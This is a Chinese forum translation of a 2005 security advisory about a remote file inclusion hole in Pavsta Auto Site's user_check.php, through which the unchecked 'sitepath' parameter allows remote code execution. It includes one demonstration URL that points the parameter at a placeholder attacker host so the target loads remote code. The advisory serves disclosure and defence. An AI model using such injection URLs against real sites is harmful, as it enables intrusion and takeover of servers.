[翻译]Pavsta Auto Site包含的user_check.php文件存在漏洞允许用户运行任意指令
资料翻译: fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker ID: 1014321
SecurityTracker URL: http:// securitytracker.com/id?1014321
CVE 叁考: GENERIC-MAP-NOMATCH
日期: 2005 年6月 29 日
影响: 用户经由网络可以运行任意代码
影响版本: 2004 年9月22 日
描述: 来自[A]nomaly [1]n [T]he [S]ystem CreW的V4mu发现Pavsta Auto Site存在漏洞,
远程用户可以在目标主机上运行任意代码。 'user_check.php' 脚本包含的‘functions.php’
的‘sitepath’参数没有进行适当的检验。远程用户可以提供特殊构造的URL在目标系统是
执行任意的PHP代码,包括系统指令,得到系统权限。
漏洞示范:
http://[target]/user_check.php?sitepath=http://[attacker]
解决: 厂商尚未解决。
厂商网址: [url]www.pavsta.com/freescripts.php?action=pavstaautosite[/url]
页:
[1]